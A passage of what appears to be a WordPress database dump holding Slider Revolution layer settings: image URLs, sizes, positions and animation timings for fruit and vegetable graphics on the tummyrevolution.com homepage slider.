To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":380,\"startRelative\":380},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":2100,\"startRelative\":220,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Image 7\",\"alias\":\"Image 7\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic6.png\",\"imageId\":1083},\"size\":{\"width\":{\"d\":{\"v\":\"441px\",\"e\":true},\"n\":{\"v\":\"441px\"},\"t\":{\"v\":\"313px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"357px\",\"e\":true},\"n\":{\"v\":\"357px\"},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"174px\",\"e\":true}},\"originalWidth\":441,\"originalHeight\":357,\"aspectRatio\":{\"d\":{\"v\":1.2352941176470589},\"n\":{\"v\":1.2352941176470589},\"t\":{\"v\":1.2352941176470589},\"m\":{\"v\":1.2352941176470589}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":460},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1640,\"start\":460,\"startRelative\":460},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"10\":{\"text\":\"Image 8\",\"alias\":\"Fired\",\"uid\":10,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic7.png\",\"imageId\":1084},\"size\":{\"width\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"142px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"originalWidth\":165,\"originalHeight\":165,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"319px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"79px\",\"e\":true},\"m\":{\"v\":\"51px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-278px\",\"e\":true},\"n\":{\"v\":\"-186px\",\"e\":true},\"t\":{\"v\":\"-265px\",\"e\":true},\"m\":{\"v\":\"-187px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":780},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":770,\"start\":2100,\"startRelative\":-180,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(7,3,4,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/back-papaya.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"01\"}]},\"timeline\":{\"transition\":[\"slideoverright\"],\"slots\":[\"default\"],\"duration\":[\"80\"]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Ananas\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-1.png\",\"imageId\":2538},\"size\":{\"width\":{\"d\":{\"v\":\"364px\",\"e\":true},\"n\":{\"v\":\"364px\"},\"t\":{\"v\":\"363px\",\"e\":true},\"m\":{\"v\":\"196px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"368px\",\"e\":true},\"n\":{\"v\":\"368px\"},\"t\":{\"v\":\"367px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":504,\"originalHeight\":515,\"aspectRatio\":{\"d\":{\"v\":0.9786407766990292},\"n\":{\"v\":0.9786407766990292},\"t\":{\"v\":0.9786407766990292},\"m\":{\"v\":0.9786407766990292}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"t\":{\"v\":\"-55px\",\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1160,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1160,\"start\":100,\"startRelative\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":840,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Onion\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-2.png\",\"imageId\":2539},\"size\":{\"width\":{\"d\":{\"v\":\"564px\",\"e\":true},\"n\":{\"v\":\"467px\",\"e\":true},\"t\":{\"v\":\"351px\",\"e\":true},\"m\":{\"v\":\"236px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"408px\",\"e\":true},\"n\":{\"v\":\"337px\",\"e\":true},\"t\":{\"v\":\"253px\",\"e\":true},\"m\":{\"v\":\"170px\",\"e\":true}},\"originalWidth\":639,\"originalHeight\":422,\"aspectRatio\":{\"d\":{\"v\":1.514218009478673},\"n\":{\"v\":1.514218009478673},\"t\":{\"v\":1.514218009478673},\"m\":{\"v\":1.514218009478673}}},\"position\":{\"x\":{\"d\":{\"v\":\"51px\",\"e\":true},\"n\":{\"v\":\"50px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-12px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-158px\",\"e\":true},\"n\":{\"v\":\"-90px\",\"e\":true},\"t\":{\"v\":\"-20px\",\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":260},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":\"90deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1830,\"start\":260,\"startRelative\":260},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1830,\"start\":260,\"startRelative\":260},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":10,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t